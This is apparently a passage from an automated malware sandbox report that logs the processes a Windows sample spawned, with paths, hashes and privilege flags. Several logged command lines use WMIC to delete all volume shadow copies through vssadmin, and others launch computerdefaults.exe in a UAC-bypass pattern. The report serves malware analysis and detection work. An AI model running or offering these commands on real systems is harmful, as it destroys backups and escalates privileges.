                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\taskhostw.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff70cb30000
                                                                                                File size:87904 bytes
                                                                                                MD5 hash:CE95E236FC9FE2D6F16C926C75B18BAF
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:23
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:24
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >